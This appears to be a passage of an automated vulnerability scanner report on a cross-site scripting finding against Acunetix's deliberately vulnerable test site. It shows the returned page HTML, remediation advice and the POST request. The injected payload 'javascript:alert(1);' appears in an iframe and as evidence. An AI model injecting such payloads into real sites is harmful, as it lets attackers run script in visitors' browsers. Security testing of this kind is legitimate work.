wmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBRRqYXZhc2NyaXB0OmFsZXJ0KDEpO2RkKoxf6JZwzTb662XkeQt5bwg6Ohk=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKwuZOHBQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8E3ywfKaHEhONBvXfHBFlrX7Vn9g==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="javascript:alert(1);" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Parameter NewsAdAttack javascript:alert(1);Evidence javascript:alert(1);Solution フェーズ: アーキテクチャと設計
同脆弱性を引き起こさせない、あるいは容易に回避可能な精査されたライブラリ、あるいはフレームワークを使用してください。
Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
Phases: Implementation; Architecture and Design
Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.
For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.
Consult the XSS Prevention Cheat Sheet for more details on the types of encoding and escaping that are needed.
Phase: Architecture and Design
For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.
Phase: Implementation
For every web page that is generated, use and specify a character encoding such as ISO-8859-1 or UTF-8. When an encoding is not specified, the web browser may choose a different encoding by guessing which encoding is actually being used by the web page. This can cause the web browser to treat certain sequences as special, opening up the client to subtle XSS attacks. See CWE-116 for more mitigations related to encoding/escaping.
To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.
Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use an allow list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a deny list). However, deny lists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."
Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.
POST http://testaspnet.vulnweb.com/Comments.aspx?id=2
Alert tags Alert description Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology.
When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone allowing for system compromise.
There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based.
Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form, which when posted to the vulnerable site, will mount the attack. Using a malicious form will oftentimes take place when the vulnerable resource only accepts HTTP POST requests. In such a case, the form can be submitted automatically, without the victim's knowledge (e.g. by using JavaScript). Upon clicking on the malicious link or submitting the malicious form, the XSS payload will get echoed back and will get interpreted by the user's browser and execute. Another technique to send almost arbitrary requests (GET and POST) is by using an embedded client, such as Adobe Flash.
Persistent attacks occur when the malicious code is submitted to a web site where it's stored for a period of time. Examples of an attacker's favorite targets often include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site/link (e.g. an attacker site or a malicious link sent via email), just simply view the web page containing the code.
Request Request line and header section (413 bytes)
POST http://testaspnet.vulnweb.com/Comments.aspx?id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=2 Content-Length: 1784 Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (1784 bytes)
